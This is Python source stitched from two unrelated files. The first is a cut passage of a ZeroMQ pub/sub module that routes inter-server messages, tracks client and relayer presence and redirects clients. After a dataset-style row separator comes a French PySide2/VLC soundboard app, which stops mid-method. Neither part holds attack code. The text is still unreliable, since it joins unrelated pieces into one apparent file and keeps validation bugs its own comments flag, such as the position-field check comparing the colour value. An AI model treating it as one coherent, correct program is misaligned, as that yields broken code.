    lockPublish.acquire().addCallback(PublishMessageCallback,
                                      [head, fromInfo, body])
class CInternalMessage(object):
    """One inter-server pub/sub message.

    Wire format: a '|'-separated head ``destType|destId|destSock|operation|
    addition``, a '|'-separated from-filter ``fromType|fromId|fromSock``
    and an opaque body.
    """

    def __init__(self, head=b"|0|0||", from_filter=b"|0|0", body=b""):
        """Parse the wire-format head and from_filter into typed fields."""
        # Exactly five head fields and three origin fields are required;
        # anything else raises ValueError, as in the wire contract.
        self.destType, dest_id, dest_sock, self.operation, self.addition = \
            head.split(b'|')
        self.destId = int(dest_id)
        self.destSock = int(dest_sock)
        self.fromType, from_id, from_sock = from_filter.split(b'|')
        self.fromId = int(from_id)
        self.fromSock = int(from_sock)
        self.body = body

    def SetParam(self, destType, destId, destSock, operation, addition,
                 fromType, fromId, fromSock):
        """Overwrite every addressing field in one call."""
        self.destType = destType
        self.destId = destId
        self.destSock = destSock
        self.operation = operation
        self.addition = addition
        self.fromType = fromType
        self.fromId = fromId
        self.fromSock = fromSock

    def Send(self):
        """Publish this message on the shared pub socket."""
        head = "%s|%d|%d|%s|%s" % (bytes_to_str(self.destType), self.destId,
                                   self.destSock, bytes_to_str(self.operation),
                                   bytes_to_str(self.addition))
        origin = "%s|%d|%d" % (bytes_to_str(self.fromType), self.fromId,
                               self.fromSock)
        PublishMessage(head, origin, self.body)
class CConnectionItem(object):
    """Online-status record: which server a terminal is connected to and
    when it was last seen (dt_active starts at construction time)."""

    def __init__(self, server_id):
        self.dt_active = datetime.datetime.now()
        self.server_id = server_id
def NotifyTerminalStatus(terminal_type,
                         terminal_id,
                         terminal_sock,
                         operation,
                         balance="y"):
    """Broadcast that a terminal went online/offline.

    `balance` ('y'/'n') tells receivers whether to run redirect balancing
    for the terminal; the destType is the 'o' prefix plus the terminal type.
    """
    global MyServerID
    message = CInternalMessage()
    message.SetParam(TTYPE_ONLINEOFFLINE + terminal_type, terminal_id,
                     terminal_sock, operation, balance, TTYPE_SERVER,
                     MyServerID, 0)
    message.Send()
def RedirectHumanTo(client_id, server_id):
    """Tell a human client to reconnect to `server_id`'s address
    (looked up in dictServerInfo)."""
    message = CInternalMessage()
    message.SetParam(TTYPE_HUMAN, client_id, 0, OPER_REDIRECT,
                     dictServerInfo[server_id], TTYPE_SERVER, MyServerID, 0)
    message.Send()
def RegistFilter(destType, destId=None):
    """Subscribe this process to messages whose head starts with the
    prefix built from destType (and optionally destId)."""
    head = ""
    if isinstance(destType, bytes):
        destType = destType.decode('utf-8')
    if destId is None:
        head = destType
    else:
        head = "%s|%d|" % (destType, destId)
    print("RegistFilter %s......................................" % (head))
    socketSubscribe.setsockopt(zmq.SUBSCRIBE, head.encode('utf-8'))
def UnregistFilter(destType, destId=None):
    """Remove the subscription added by RegistFilter for the same
    destType/destId pair."""
    head = ""
    if isinstance(destType, bytes):
        destType = destType.decode('utf-8')
    if destId is None:
        head = destType
    else:
        head = "%s|%d|" % (destType, destId)
    print("UnRegistFilter %s ***************************************" % (head))
    socketSubscribe.setsockopt(zmq.UNSUBSCRIBE, head.encode('utf-8'))
def CheckMapsByActiveTime():
    """Evict relayer/client connections idle past the heartbeat window and
    decrement the owning server's load counter.

    Fixed: the original popped entries while iterating the live ``.keys()``
    view, which raises RuntimeError on Python 3 when the dict changes size;
    iterate over a snapshot of the keys instead.
    """
    with lockMaps:
        # Single cutoff timestamp for both maps.
        cutoff = datetime.datetime.now() - datetime.timedelta(
            seconds=Config.time_heartbeat)
        for relayer_id in list(dictRelayerServer.keys()):
            if dictRelayerServer[relayer_id].dt_active < cutoff:
                # timeout
                item = dictRelayerServer.pop(relayer_id)
                dictServerLoad[
                    item.server_id] = dictServerLoad[item.server_id] - 1
        for client_id in list(dictClientServer.keys()):
            if dictClientServer[client_id].dt_active < cutoff:
                # timeout
                item = dictClientServer.pop(client_id)
                dictServerLoad[
                    item.server_id] = dictServerLoad[item.server_id] - 1
def LoadMapsFromDatabase():
    """Rebuild the in-memory online maps and per-server load counters from
    the DB, counting only connections active within the heartbeat window."""
    dictServerLoad.clear()
    dictClientServer.clear()
    dictRelayerServer.clear()
    with SBDB.session_scope() as session:
        for client in session.query(SBDB_ORM.Client).filter(
                SBDB_ORM.Client.dt_active > datetime.datetime.now() -
                datetime.timedelta(seconds=Config.time_heartbeat)).all():
            item = CConnectionItem(client.server_id)
            # Keep the DB's activity timestamp, not construction time.
            item.dt_active = client.dt_active
            dictClientServer[client.id] = item
            dictServerLoad[item.server_id] = dictServerLoad.get(
                item.server_id, 0) + 1
        for relayer in session.query(SBDB_ORM.Relayer).filter(
                SBDB_ORM.Relayer.dt_active > datetime.datetime.now() -
                datetime.timedelta(seconds=Config.time_heartbeat)).all():
            item = CConnectionItem(relayer.server_id)
            item.dt_active = relayer.dt_active
            dictRelayerServer[relayer.id] = item
            dictServerLoad[item.server_id] = dictServerLoad.get(
                item.server_id, 0) + 1
def ThreadCheckMaps():
    """Background loop: seed the maps from the DB, then once per heartbeat
    evict stale connections and broadcast OPER_LOAD so every server
    refreshes its server list.  The loop ticks every 2 seconds."""
    from SBPS import ProtocolReactor
    LoadMapsFromDatabase()
    # Number of 2-second ticks per heartbeat interval.
    waitTimes = Config.time_heartbeat / 2
    n = 0
    while not ProtocolReactor.bReactorStopped:
        if 0 == n:
            CheckMapsByActiveTime()
            # notify all server to load config
            message = CInternalMessage()
            message.SetParam(TTYPE_SERVER, 0, 0, OPER_LOAD, "", TTYPE_SERVER,
                             MyServerID, 0)
            message.Send()
        n = (n + 1) % waitTimes
        time.sleep(2)
def traced_ThreadCheckMaps():
    """Thread entry point: run ThreadCheckMaps and print the traceback of
    any escaping exception so thread deaths are not silent."""
    import traceback
    try:
        ThreadCheckMaps()
    except:
        print(traceback.format_exc())
def RunOnlineMessage(message):
    """Handle an online/offline broadcast (destType b'o' + terminal type).

    Maintains the client/relayer -> server maps and per-server load
    counters; when a human client comes online with balancing requested,
    may redirect it to the server already holding one of its relayers.

    Fixes over the original (Python 2 -> 3 migration bugs):
      * indexing bytes yields an int, so ``destType[1] == TTYPE_HUMAN``
        (int vs bytes) was always False — compare a one-byte slice instead;
      * ``addition.lower() == 'y'`` compared bytes to str — use b'y';
      * target_server_id stored a *relayer* id, but RedirectHumanTo looks
        it up in dictServerInfo which is keyed by *server* id.
    """
    global dictRelayerServer, dictClientServer, dictServerLoad, dictServerInfo, lockMaps
    with lockMaps:
        if len(message.destType) < 2:
            return
        if message.destType[1:2] == TTYPE_HUMAN:
            session_key = message.destId
            if message.operation == OPER_ONLINE:
                if session_key not in dictClientServer:
                    dictServerLoad[message.fromId] = dictServerLoad.get(
                        message.fromId, 0) + 1
                    dictClientServer[session_key] = CConnectionItem(
                        message.fromId)
                else:
                    dictClientServer[session_key].server_id = message.fromId
                dictClientServer[
                    session_key].dt_active = datetime.datetime.now()
                if message.addition.lower() == b'y':  # need redirect checking
                    listRelayeres = SBDB.GetRelayeresByAccountId(
                        message.fromId)
                    target_server_id = -1
                    for relayer_id in listRelayeres:
                        if relayer_id in dictRelayerServer:
                            # if there is a relayer connected to that account is connected on the same server with the account connection, don't redirect the account connection
                            if dictRelayerServer[
                                    relayer_id].server_id == message.fromId:
                                return
                            else:
                                # NOTE(review): the original assigned
                                # relayer_id here — confirm server id intended.
                                target_server_id = dictRelayerServer[
                                    relayer_id].server_id
                    if target_server_id > -1:
                        RedirectHumanTo(message.destId, target_server_id)
            elif message.operation == OPER_OFFLINE:
                if session_key in dictClientServer:
                    dictServerLoad[message.fromId] = dictServerLoad.get(
                        message.fromId, 0) - 1
                    dictClientServer.pop(session_key)
        elif message.destType[1:2] == TTYPE_GATEWAY:
            if message.operation == OPER_ONLINE:
                if message.destId not in dictRelayerServer:
                    dictServerLoad[message.fromId] = dictServerLoad.get(
                        message.fromId, 0) + 1
                    dictRelayerServer[message.destId] = CConnectionItem(
                        message.fromId)
                else:
                    dictRelayerServer[
                        message.destId].server_id = message.fromId
                dictRelayerServer[
                    message.destId].dt_active = datetime.datetime.now()
            elif message.operation == OPER_OFFLINE:
                if message.destId in dictRelayerServer:
                    dictServerLoad[message.fromId] = dictServerLoad.get(
                        message.fromId, 0) - 1
                    dictRelayerServer.pop(message.destId)
def RunTransmitMessage(message):
    """Execute a transmitted command or a redirect notification.

    OPER_REQUEST / OPER_RESPONSE: rebuild the command object from the raw
    body (first 8 bytes are big-endian length and command id) and run it.
    OPER_REDIRECT: tell the client to reconnect to the address carried in
    message.addition.
    """
    if message.operation in [OPER_REQUEST, OPER_RESPONSE]:
        length, command_id = struct.unpack("!2I", message.body[:8])
        try:
            command = Command.dicInt_Type[command_id](message.body,
                                                      protocolInternal)
        except Exception as e:
            print(traceback.format_exc())
            logging.error(
                "build command exception in protocolInternal transport %d: %s :%s",
                id(protocolInternal.transport), str(e),
                Util.asscii_string(message.body))
            # BUG FIX: previously execution fell through with command=None
            # and crashed on command.internalMessage below; bail out here.
            return
        command.internalMessage = message
        # threads.deferToThread(command.Run)
        command.Run()
    elif message.operation == OPER_REDIRECT:
        notify = RedirectNotify.CRedirectNotify(
            client_id=message.destId, addr=message.addition)
        notify.Notify()
def RunServerMessage(message):
    """Handle server-to-server control messages.

    OPER_LOAD refreshes the subscription list from the database; when the
    request originated from a management console, the message is echoed
    back relabelled as a server message. Every server message also
    refreshes this server's active-time heartbeat in the database.
    """
    if message.operation == OPER_LOAD:
        AddSubscribeServer(SBDB.GetServers(SBDB.CV_TYPE_SERVER_FUNCTION))
        AddSubscribeServer(
            SBDB.GetServers(SBDB.CV_TYPE_SERVER_SUPERVISION),
            SBDB.CV_TYPE_SERVER_SUPERVISION)
        if message.fromType == TTYPE_MANAGEMENT:
            message.fromType = TTYPE_SERVER
            message.Send()
    SBDB.UpdateActiveTimeServer(MyServerID)
# Dispatch table keyed on the first byte of message.destType:
# 'o' online/offline presence, 'g' gateway / 'h' human traffic, 's' server control.
dictProcessor = {
    ord('o'): RunOnlineMessage,
    ord('g'): RunTransmitMessage,
    ord('h'): RunTransmitMessage,
    ord('s'): RunServerMessage
}
# Number of messages currently in flight; Run() throttles intake against
# Config.count_connection. Guarded by lockPendingCmd.
countPendingCmd = 0
lockPendingCmd = threading.RLock()
def ProcessMessage(head, from_filter, body):
    """Decode one multipart message and dispatch it via dictProcessor.

    Always releases its throttle slot (countPendingCmd) when done, even if
    decoding or the handler raises. Removed stray "44444"/"55555" debug
    prints.
    """
    global countPendingCmd, lockPendingCmd
    try:
        print("data received of InternalMessage %s:%s:%s (%s%s%s)" %
              (head, from_filter, body, Util.asscii_string(head),
               Util.asscii_string(from_filter), Util.asscii_string(body)))
        message = CInternalMessage(head, from_filter, body)
        typeMessage = message.destType[0]
        if typeMessage in dictProcessor:
            dictProcessor[typeMessage](message)
    except:
        print(traceback.format_exc())
    finally:
        # BUG FIX: the decrement used to live inside the try block, so any
        # exception above leaked a pending-command slot and could
        # eventually stall message intake in Run().
        with lockPendingCmd:
            countPendingCmd = countPendingCmd - 1
def Run():
    """Main subscriber loop: create the pub/sub sockets and dispatch messages.

    Receives multipart [head, from_filter, body] frames from the SUB socket
    and hands each to ProcessMessage on a thread-pool thread, throttled by
    countPendingCmd so at most Config.count_connection messages are in
    flight at once. Loops until the protocol reactor is stopped.
    """
    from SBPS import ProtocolReactor
    global socketSubscribe, socketPublish, MyServerType, context, countPendingCmd, lockPendingCmd
    context = zmq.Context()
    socketSubscribe = context.socket(zmq.SUB)
    socketPublish = context.socket(zmq.PUB)
    # subscribe to every known function server and supervision server
    AddSubscribeServer(SBDB.GetServers(SBDB.CV_TYPE_SERVER_FUNCTION))
    AddSubscribeServer(
        SBDB.GetServers(SBDB.CV_TYPE_SERVER_SUPERVISION),
        SBDB.CV_TYPE_SERVER_SUPERVISION)
    socketPublish.bind("tcp://*:%d" % (PORT_PUBSUB))
    # accept broadcast (id 0) and direct messages addressed to this server
    RegistFilter(TTYPE_SERVER, 0)
    RegistFilter(TTYPE_SERVER, MyServerID)
    if MyServerType == SBDB.CV_TYPE_SERVER_SUPERVISION:
        # supervision servers also track presence (online/offline) maps
        threading.Thread(target=traced_ThreadCheckMaps, daemon=True).start()
        RegistFilter(TTYPE_ONLINEOFFLINE)
    while not ProtocolReactor.bReactorStopped:
        try:
            [head, from_filter, body] = socketSubscribe.recv_multipart()
            with lockPendingCmd:
                if countPendingCmd < Config.count_connection:
                    countPendingCmd = countPendingCmd + 1
                    threads.deferToThread(ProcessMessage, head, from_filter,
                                          body)
                # NOTE(review): a message arriving while at capacity appears
                # to be silently dropped — confirm this is intended.
        except:
            print(traceback.format_exc())
    print("InternalMessage.Run() returned")
def traced_Run():
    """Wrapper around Run() that prints any escaping traceback instead of
    propagating it to the caller/thread."""
    try:
        Run()
    except BaseException:
        # same breadth as the original bare except
        print(traceback.format_exc())
def Stop():
    """Tear down the ZeroMQ resources at shutdown.

    Cancels the internal-protocol keep-alive timer, closes both sockets and
    terminates the context. Any error during teardown is logged and
    swallowed so shutdown always completes.
    """
    try:
        if protocolInternal:
            protocolInternal.timer.cancel()
        socketPublish.close()
        socketSubscribe.close()
        context.term()
    except:
        print(traceback.format_exc())
|
991,447 | 27dcd3afb436a08c860bfb7743404fbfffbbaed3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Application de SoundBoard avec interface Qt
======================
Exécuter pour commencer l'utilisation de la SoundBoard.
"""
import json
from PySide2.QtCore import (QRect, QSize)
from PySide2.QtWidgets import (
QApplication, QDialog, QVBoxLayout, QHBoxLayout, QGroupBox, QLabel,
QGridLayout, QPushButton, QToolButton, QTableWidget, QLineEdit,
QSpacerItem, QSizePolicy, QHeaderView, QTableWidgetItem, QFileDialog,
QWidget, QColorDialog)
from PySide2.QtGui import (QIcon, QPixmap, QColor)
import sys
import operator
from math import sqrt, ceil
import vlc
# Directory holding the sound files referenced by buttons.json.
soundRep = "./sons/"
# Single shared VLC instance and media player used for all playback.
instance = vlc.Instance()
p = instance.media_player_new()
class SoundBoard(QDialog):
    """Main soundboard window: a grid of colored buttons, each playing a sound.

    Button definitions (name, file, position, RGB color) and the grid size
    are persisted in buttons.json next to the script; playback goes through
    the module-level shared VLC player ``p``.
    """

    def __init__(self):
        super(SoundBoard, self).__init__()
        self.title = '=== SoundBoard ==='
        # window position at startup
        self.left = 50
        self.top = 50
        # default window width and height
        self.width = 500
        self.height = 500
        # name of the file currently playing (used for play/stop toggling)
        self.currFileName = ""
        # position of the button being edited, or -1 when adding a new one
        self.pbPosToModify = -1
        self.initUI()

    def initUI(self):
        """Build the window chrome, menu, color picker and button grid."""
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.windowLayout = QHBoxLayout()
        self.tableWidget = QTableWidget()
        self.tableWidget.horizontalHeader().hide()
        self.tableWidget.verticalHeader().hide()
        self.initIcons()
        self.initMenu()
        self.initColorPicker()
        self.initButtons()
        self.windowLayout.setStretch(1, 0)
        self.setLayout(self.windowLayout)
        self.show()

    def initIcons(self):
        """Load the toolbar icons from the ./icons directory."""
        self.iEdit = QIcon()
        self.iEdit.addPixmap(QPixmap(
            "./icons/edit.png"), QIcon.Normal, QIcon.Off)
        self.iPlus = QIcon()
        self.iPlus.addPixmap(QPixmap(
            "./icons/plus.png"), QIcon.Normal, QIcon.Off)
        self.iMinus = QIcon()
        self.iMinus.addPixmap(QPixmap(
            "./icons/minus.png"), QIcon.Normal, QIcon.Off)
        self.iParam = QIcon()
        self.iParam.addPixmap(QPixmap(
            "./icons/cog.png"), QIcon.Normal, QIcon.Off)

    def initMenu(self):
        """Build the left-hand menu: add/delete/edit/settings tools and the
        big stop button."""
        layout = QVBoxLayout()
        hlayout = QHBoxLayout()
        # add button
        self.tbPlus = QToolButton()
        self.tbPlus.setGeometry(QRect(0, 0, 32, 32))
        self.tbPlus.setIcon(self.iPlus)
        self.tbPlus.setObjectName("tbPlus")
        hlayout.addWidget(self.tbPlus)
        self.tbPlus.clicked.connect(self.add)
        # delete button
        self.tbMinus = QToolButton()
        self.tbMinus.setGeometry(QRect(0, 0, 32, 32))
        self.tbMinus.setIcon(self.iMinus)
        self.tbMinus.setObjectName("tbMinus")
        hlayout.addWidget(self.tbMinus)
        self.tbMinus.clicked.connect(self.delete)
        # edit button
        self.tbEdit = QToolButton()
        self.tbEdit.setGeometry(QRect(0, 0, 32, 32))
        self.tbEdit.setIcon(self.iEdit)
        self.tbEdit.setObjectName("tbEdit")
        hlayout.addWidget(self.tbEdit)
        self.tbEdit.clicked.connect(self.editBtn)
        # settings button
        self.tbParam = QToolButton()
        self.tbParam.setGeometry(QRect(0, 0, 32, 32))
        self.tbParam.setIcon(self.iParam)
        self.tbParam.setObjectName("tbParam")
        hlayout.addWidget(self.tbParam)
        self.tbParam.clicked.connect(self.settings)
        layout.addLayout(hlayout)
        # big stop button (label is an intentional pun, keep as-is)
        self.pbStop = QPushButton("Don't STOP\n\nthe\n\nSoundBoard")
        self.pbStop.setStyleSheet("font-weight: bold;")
        self.pbStop.setMinimumSize(QSize(100, 100))
        self.pbStop.setGeometry(QRect(0, 0, 100, 100))
        layout.addWidget(self.pbStop)
        self.pbStop.clicked.connect(self.stop)
        spacerMenu = QSpacerItem(
            20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
        layout.addItem(spacerMenu)
        self.windowLayout.addLayout(layout)

    def startInitButtons(self):
        """Reset the table widget and reload button data from buttons.json."""
        self.tableWidget.clear()
        self.tableWidget.clearSpans()
        self.tableWidget.setColumnWidth(0, 100)
        self.tableWidget.setColumnWidth(2, 100)
        self.cdColorPicker.setVisible(False)
        self.tableWidget.horizontalHeader().hide()
        # load button definitions from the json file
        with open('buttons.json', encoding='utf-8') as json_file:
            self.data_buttons = json.load(json_file)
        # keep the highest occupied position for bounds checking
        self.positions = [p['position'] for p in self.data_buttons['buttons']]
        self.max_pos = max(self.positions)
        # grid dimensions: buttons per column (height) and per row (width)
        self.BtnH = self.data_buttons['buttons_grid']['height']
        self.BtnW = self.data_buttons['buttons_grid']['width']
        self.setGeometry(self.left, self.top,
                         140 + self.BtnW*100,
                         175 if self.BtnH*31 < 175 else 25 + self.BtnH*30)
        self.tableWidget.setColumnCount(self.BtnW)
        self.tableWidget.setRowCount(self.BtnH)

    def endInitButtons(self):
        """Attach the (re)built table to the window and resize to fit."""
        buttonsLayout = QVBoxLayout()
        buttonsLayout.setStretch(0, 1)
        buttonsLayout.addWidget(self.tableWidget)
        self.windowLayout.addLayout(buttonsLayout)
        self.setGeometry(self.left, self.top,
                         140 + self.BtnW*100,
                         175 if self.BtnH*31 < 175 else 25 + self.BtnH*30)

    def initButtons(self):
        """Populate the grid: one play button per json entry, 'Nouveau'
        placeholders on empty cells."""
        self.startInitButtons()
        # place buttons according to the positions stored in the json
        for ligne in range(self.BtnH):
            for colonne in range(self.BtnW):
                if (ligne*self.BtnW)+(colonne+1) in self.positions:
                    for b in self.data_buttons['buttons']:
                        if b['position'] == (ligne*self.BtnW)+(colonne+1):
                            pb = QPushButton(b['name'][:9])
                            pb.setProperty('pbPos', b['position'])
                            # light background -> black text, dark -> white
                            if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
                            else:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
                            self.tableWidget.setCellWidget(
                                ligne, colonne, pb)
                            pb.clicked.connect(self.play)
                else:
                    pb = QPushButton('Nouveau')
                    calcPos = self.BtnW*ligne + colonne + 1
                    pb.setProperty('pbPos', f"nouveau,{calcPos}")
                    pb.clicked.connect(self.add)
                    self.tableWidget.setCellWidget(
                        ligne, colonne, pb)
                # NOTE(review): the two increments below are redundant —
                # the for loops already drive these counters.
                colonne += 1
            ligne += 1
        self.endInitButtons()

    def initColorPicker(self):
        """Create the (initially hidden) inline color dialog."""
        self.lColorPicker = QVBoxLayout()
        self.cdColorPicker = QColorDialog()
        self.cdColorPicker.setOption(self.cdColorPicker.NoButtons, True)
        self.colorSelected = self.cdColorPicker.currentColor()
        self.lColorPicker.addWidget(self.cdColorPicker)
        self.cdColorPicker.setVisible(False)
        self.cdColorPicker.currentColorChanged.connect(self.colorChanged)
        self.windowLayout.addLayout(self.lColorPicker)

    def play(self):
        """Play the sound bound to the clicked button.

        Clicking the currently-playing button stops it; clicking a
        different one switches playback to that file.
        """
        pb = self.sender()
        pbPos = pb.property('pbPos')
        # NOTE(review): pbFile stays unbound if pbPos matches no entry —
        # presumably every play button has a json entry; confirm.
        for b in self.data_buttons['buttons']:
            if pbPos == b['position']:
                pbFile = b['file']
        if (p.get_state() == vlc.State.Playing):
            p.stop()
            media = instance.media_new(soundRep + pbFile)
            if (self.currFileName != pbFile):
                p.set_media(media)
                p.play()
                self.currFileName = pbFile
        else:
            media = instance.media_new(soundRep + pbFile)
            p.set_media(media)
            p.play()
            self.currFileName = pbFile

    def stop(self):
        """Stop playback on the shared player."""
        p.stop()

    def add(self):
        """Show the add/edit form: an input row plus the list of existing
        buttons, with the color picker visible."""
        self.cdColorPicker.setVisible(True)
        self.tableWidget.clear()
        self.tableWidget.clearSpans()
        self.tableWidget.setColumnWidth(2, 100)
        self.tableWidget.setColumnCount(6)
        self.tableWidget.setRowCount(len(self.data_buttons['buttons'])+1)
        self.tableWidget.horizontalHeader().show()
        self.tableWidget.setHorizontalHeaderItem(0, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(0).setText('Nom')
        self.tableWidget.setHorizontalHeaderItem(1, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(1).setText('Fichier')
        self.tableWidget.setHorizontalHeaderItem(2, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(2).setText('')
        self.tableWidget.setColumnWidth(2, 22)
        self.tableWidget.setHorizontalHeaderItem(3, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(3).setText('Position')
        self.tableWidget.setHorizontalHeaderItem(4, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(4).setText('Couleur')
        self.tableWidget.setHorizontalHeaderItem(5, QTableWidgetItem())
        self.tableWidget.horizontalHeaderItem(5).setText('')
        # name field
        self.leName = QLineEdit()
        self.leName.setPlaceholderText('Nom (10 max.)')
        self.tableWidget.setCellWidget(0, 0, self.leName)
        # file field
        self.leFile = QLineEdit()
        self.leFile.setPlaceholderText('Fichier')
        self.tableWidget.setCellWidget(0, 1, self.leFile)
        # browse button
        pbBrowser = QPushButton('...')
        pbBrowser.setMinimumSize(QSize(21, 21))
        pbBrowser.clicked.connect(self.browseMedia)
        self.tableWidget.setCellWidget(0, 2, pbBrowser)
        # position field
        self.lePos = QLineEdit()
        self.lePos.setPlaceholderText('Position')
        self.tableWidget.setCellWidget(0, 3, self.lePos)
        # color field (pre-filled from the picker's current color)
        self.leColor = QLineEdit()
        self.leColor.setPlaceholderText('255,255,255')
        self.leColor.setText(str(self.colorSelected.red())+","
                             + str(self.colorSelected.green())+","
                             + str(self.colorSelected.blue()))
        self.tableWidget.setCellWidget(0, 4, self.leColor)
        # validation button
        pbValid = QPushButton('Valider')
        pbValid.clicked.connect(self.addValid)
        self.tableWidget.setCellWidget(0, 5, pbValid)
        # when triggered from an empty "Nouveau" cell, pre-fill its position
        pb = self.sender()
        pbPos = pb.property('pbPos')
        if pbPos is not None:
            if str(pbPos)[:8] == 'nouveau,':
                self.lePos.setText(pbPos[8:])

        def sortByPos(val):
            # sort key: grid position of a button entry
            return val['position']
        self.data_buttons['buttons'].sort(key=sortByPos)
        # list existing buttons below the input row
        for ligne, b in enumerate(self.data_buttons['buttons'], start=1):
            self.tableWidget.setSpan(ligne, 1, 1, 2)
            self.tableWidget.setCellWidget(ligne, 0, QLabel(b['name']))
            self.tableWidget.setCellWidget(ligne, 1, QLabel(b['file']))
            self.tableWidget.setCellWidget(
                ligne, 3, QLabel(str(b['position'])))
            self.tableWidget.setCellWidget(ligne, 4, QLabel('Couleur'))
        # 530 color picker width
        self.setGeometry(self.left, self.top, 690+530, 300)

    def addValid(self):
        """Validate the add/edit form and persist the button to buttons.json."""
        gName = self.leName.text()
        self.leName.setStyleSheet("color: rgb(0,0,0);")
        gFile = self.leFile.text()
        self.leFile.setStyleSheet("color: rgb(0,0,0);")
        gPos = self.lePos.text()
        self.lePos.setStyleSheet("color: rgb(0,0,0);")
        gColor = self.leColor.text()
        self.leColor.setStyleSheet("color: rgb(0,0,0);")
        # empty-field check
        # NOTE(review): the third clause compares gColor (not gPos) against
        # 'Obligatoire !' — looks like a copy-paste bug; confirm and fix.
        if ((gName == '' or gName == 'Obligatoire !')
                or (gFile == '' or gFile == 'Obligatoire !')
                or (gPos == '' or gColor == 'Obligatoire !')
                or (gColor == '' or gColor == 'Obligatoire !')):
            if gName == '' or gName == 'Obligatoire !':
                self.leName.setText('Obligatoire !')
                self.leName.setStyleSheet(
                    "color: rgb(255,0,0); font-weight: bold;")
            if gFile == '' or gFile == 'Obligatoire !':
                self.leFile.setText('Obligatoire !')
                self.leFile.setStyleSheet(
                    "color: rgb(255,0,0); font-weight: bold;")
            # NOTE(review): same gColor-vs-gPos suspicion as above.
            if gPos == '' or gColor == 'Obligatoire !':
                self.lePos.setText('Obligatoire !')
                self.lePos.setStyleSheet(
                    "color: rgb(255,0,0); font-weight: bold;")
            if gColor == '' or gColor == 'Obligatoire !':
                self.leColor.setText('Obligatoire !')
                self.leColor.setStyleSheet(
                    "color: rgb(255,0,0); font-weight: bold;")
        else:
            # check that the position field is a number
            try:
                flag = 0
                flag = int(gPos)
            except ValueError:
                self.lePos.setText(
                    f"{str(gPos)} n'est pas un nombre")
                self.lePos.setStyleSheet(
                    "color: rgb(255,0,0); font-weight: bold;")
            # position is a number
            # NOTE(review): a literal "0" also leaves flag == 0 and is
            # silently ignored (position 0 is out of range anyway).
            if flag != 0:
                # position outside the grid
                if int(gPos) < 0 or int(gPos) > self.data_buttons['buttons_grid']['height']*self.data_buttons['buttons_grid']['width']:
                    self.lePos.setText(
                        f"{str(gPos)} hors grille")
                    self.lePos.setStyleSheet(
                        "color: rgb(255,0,0); font-weight: bold;")
                else:
                    dictToAppend = {
                        "name": gName,
                        "file": gFile,
                        "position": int(gPos),
                        "r": self.colorSelected.red(),
                        "g": self.colorSelected.green(),
                        "b": self.colorSelected.blue()
                    }
                    # editing an existing button: drop the old entry first
                    if self.pbPosToModify != -1:
                        for b in self.data_buttons['buttons']:
                            if b['position'] == self.pbPosToModify:
                                self.data_buttons['buttons'].remove(b)
                        self.data_buttons['buttons'].append(dictToAppend)
                        with open('buttons.json', 'w', encoding='utf-8') as outfile:
                            json.dump(self.data_buttons, outfile, indent=4)
                        self.initButtons()
                    else:
                        # position already taken by another button
                        if int(gPos) in self.positions:
                            self.lePos.setText(
                                f"{str(gPos)} déjà prise")
                            self.lePos.setStyleSheet(
                                "color: rgb(255,0,0); font-weight: bold;")
                        else:
                            self.data_buttons['buttons'].append(dictToAppend)
                            with open('buttons.json', 'w', encoding='utf-8') as outfile:
                                json.dump(self.data_buttons, outfile, indent=4)
                            self.initButtons()

    def delete(self):
        """Switch the grid to delete mode: clicking a button removes it."""
        self.startInitButtons()
        # place buttons according to the positions stored in the json
        for ligne in range(self.BtnH):
            for colonne in range(self.BtnW):
                if (ligne*self.BtnW)+(colonne+1) in self.positions:
                    for b in self.data_buttons['buttons']:
                        if b['position'] == (ligne*self.BtnW)+(colonne+1):
                            pb = QPushButton(b['name'][:9])
                            pb.setProperty('pbPos', b['position'])
                            pb.setIcon(self.iMinus)
                            # light background -> black text, dark -> white
                            if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
                            else:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
                            self.tableWidget.setCellWidget(
                                ligne, colonne, pb)
                            pb.clicked.connect(self.deleteTw)
                else:
                    pb = QPushButton('Nouveau')
                    calcPos = self.BtnW*ligne + colonne + 1
                    pb.setProperty('pbPos', f"nouveau,{calcPos}")
                    pb.clicked.connect(self.add)
                    self.tableWidget.setCellWidget(
                        ligne, colonne, pb)
                # NOTE(review): redundant — the for loops drive these.
                colonne += 1
            ligne += 1
        self.endInitButtons()

    def deleteTw(self):
        """Remove the clicked button's entry and rewrite buttons.json."""
        pb = self.sender()
        pbPos = pb.property('pbPos')
        for b in self.data_buttons['buttons']:
            if b['position'] == pbPos:
                self.data_buttons['buttons'].remove(b)
        with open('buttons.json', 'w', encoding='utf-8') as outfile:
            json.dump(self.data_buttons, outfile, indent=4)
        # stay in delete mode so several buttons can be removed in a row
        self.delete()

    def editBtn(self):
        """Switch the grid to edit mode: clicking a button opens the form
        pre-filled with its data."""
        self.startInitButtons()
        # place buttons according to the positions stored in the json
        for ligne in range(self.BtnH):
            for colonne in range(self.BtnW):
                if (ligne*self.BtnW)+(colonne+1) in self.positions:
                    for b in self.data_buttons['buttons']:
                        if b['position'] == (ligne*self.BtnW)+(colonne+1):
                            pb = QPushButton(b['name'][:9])
                            pb.setProperty('pbPos', b['position'])
                            pb.setIcon(self.iEdit)
                            # light background -> black text, dark -> white
                            if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
                            else:
                                pb.setStyleSheet(
                                    f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
                            self.tableWidget.setCellWidget(
                                ligne, colonne, pb)
                            pb.clicked.connect(self.editTw)
                else:
                    pb = QPushButton('Nouveau')
